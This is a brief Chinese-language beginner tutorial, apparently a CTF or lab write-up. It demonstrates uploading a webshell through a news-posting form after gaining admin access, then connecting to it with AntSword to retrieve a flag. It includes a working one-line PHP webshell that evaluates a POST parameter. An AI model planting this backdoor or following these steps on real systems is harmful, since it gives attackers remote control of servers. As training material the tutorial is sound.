上传webshell新手演示
写好一句话木马
<?php eval(@$_POST['shell']); ?>
webshell的分类
①根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它)
②根据脚本名称分类:jsp、asp、aspx、php
写成php形式
寻找页面上传点(上传木马)
在上一篇内容中我们知道了如何用sqlmap注入获取后台的账号密码,登录上后台界面
在页面中寻找木马(一句话木马)上传点。
发现新增新闻和添加教室都包含有文件上传点
以添加新闻举例,先上传木马
上传成功
寻找上传后的文件位置(绝对路径)
在页面中多找找,发散思维,发现这儿有咱们上传的木马
咱们点击修改试试!
捉到了咱们上传的php文件
它被当成了图片
在次复制到了上传文件的绝对路径
下面该上工具来连接目标主机了
连接上目标主机
可以用蚁剑、中国菜刀等工具
这里用蚁剑演示
添加数据
连接密码就是一句话木马中POST传的参数
单击添加
双击进入
找到目标flag
经过一番搜寻在home目录中发现了flag
打开得到flag